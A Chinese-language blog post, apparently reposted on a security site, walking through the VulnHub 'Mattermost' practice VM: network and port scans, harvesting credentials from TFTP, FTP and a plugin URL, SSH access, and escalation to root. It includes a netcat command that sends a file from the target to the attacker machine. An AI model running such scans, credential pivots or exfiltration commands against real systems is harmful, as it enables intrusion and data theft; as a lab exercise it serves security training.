vulnhub之mattermost的实践

admin 2025年2月20日19:55:34评论9 views字数 995阅读3分19秒阅读模式

今天实践的是vulnhub的mattermost镜像,下载地址,

https://download.vulnhub.com/enumbox/Mattermost.7z,

用workstation导入成功,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

vulnhub之mattermost的实践

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.53,

vulnhub之mattermost的实践

浏览器访问一下http://192.168.137.53:8065,需要用户名密码登录,

vulnhub之mattermost的实践

接下来的事情就比较尴尬了,竟然想到可能有udp的tftp服务,

扫描一下,真有,sudo nmap -sU -p 69 192.168.137.53,

vulnhub之mattermost的实践

登录,下载文件,tftp 192.168.137.53,
get README.md
quit
cat README.md

得到了用户名密码,Admin/ComplexPassword0!,登录8065的界面,

找到一个zoom插件的地方,使能插件后,得到一个url,

vulnhub之mattermost的实践

访问这个url,http://192.168.137.53/JK94vsNKAns6HBkG/AxRt6LwuA7A6N4gk/index.html,

得到新的用户名密码,ftpuser/ftppassword,登录ftp,

ftp 192.168.137.53
ftpuser
ftppassword
dir
cd users
dir
cd mattermost
dir
get message
bye
cat message

又获取到新的用户名密码,mattermost/Welcome!!!,

这回能ssh登录,登录进去后发现了提示信息,但执行文件说key过期,

ls
cd Desktop
ls
cat README.md
./secret

vulnhub之mattermost的实践

想办法把secret文件搞出来,kali攻击机上nc -nlvp 1234 > secret,

靶机上,cat secret | nc 192.168.137.141 1234,

kali攻击机上安装反编译软件ghidra

sudo apt update,sudo apt install ghidra,
cd /usr/share/ghidra,./ghidraRun,

反编译得到key,0xf447,转成10进制,62535,

vulnhub之mattermost的实践

这回再执行文件,输入正确的key,id一下确认是root,

vulnhub之mattermost的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之mattermost的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月20日19:55:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之mattermost的实践https://cn-sec.com/archives/894621.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息